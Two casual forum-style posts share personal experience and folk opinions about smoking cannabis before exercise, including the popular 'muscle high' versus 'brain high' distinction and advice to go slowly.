    Always remember, we like to forget that weed is a psychedelic (mild one, but still) so it affects everyone differently. Some trip out, some don't even feel it! The name of the game is tolerance, and for everyone that is personal. The important thing is to take it slow and listen to your body and, in this case specifically, your mind. As someone who enjoys smoking before a workout I find my mind more centered, but I've also smoked myself silly and ditched the workout 50% of the way in. Don't beat yourself up, its a journey!

    Didn't even bring up the different types of weed after research. Muscle high and brain high, brain high is suggested for exercise and does not give you the munchies as muscle high is called the couch potato high which is what Anti-Marijuana argument uses when talking about weed.
